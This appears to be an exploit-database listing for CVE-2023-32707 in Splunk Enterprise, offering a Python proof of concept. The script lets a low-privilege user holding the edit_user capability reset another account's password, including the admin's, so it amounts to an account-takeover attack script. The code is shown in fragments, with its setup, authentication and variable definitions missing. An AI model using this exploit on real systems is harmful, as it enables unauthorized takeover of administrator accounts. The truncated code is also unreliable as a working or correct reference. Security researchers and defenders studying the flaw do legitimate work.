Splunk 9.0.5 admin account take over Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-10-09 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Splunk 9.0.5 admin account take over is for educational purposes only and if it is used you will do on your own risk!
# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
#
# Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
#
import argparse
import requests
import random
import string
import base64
# ignore warnings
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if response.status_code == 200:
affected_versions = ['9.0.4', '8.2.10', '8.1.13']
user = response.json()
splunk_version = user['generator']['version']
# This is not a good way to compare versions.
# There is a range of versions that are affected by this CVE, but this is just a PoC
# 8.1.0 to 8.1.13
# 8.2.0 to 8.2.10
# 9.0.0 to 9.0.4
print(f"Detected Splunk version '{splunk_version}'")
if any(splunk_version <= value for value in affected_versions) or force_exploit:
user_capabilities = user['entry'][0]['content']['capabilities']
if 'edit_user' in user_capabilities:
print(
f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
new_password = ''.join(random.choice(
string.ascii_letters + string.digits) for _ in range(8))
change_password_payload = {
'password': new_password,
'force-change-pass': 0,
'locked-out': 0
}
response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
data=change_password_payload, headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
print(
f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
else:
print('Account takeover failed')
else:
print(
f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
else:
print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
else:
print(
f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
exit(1)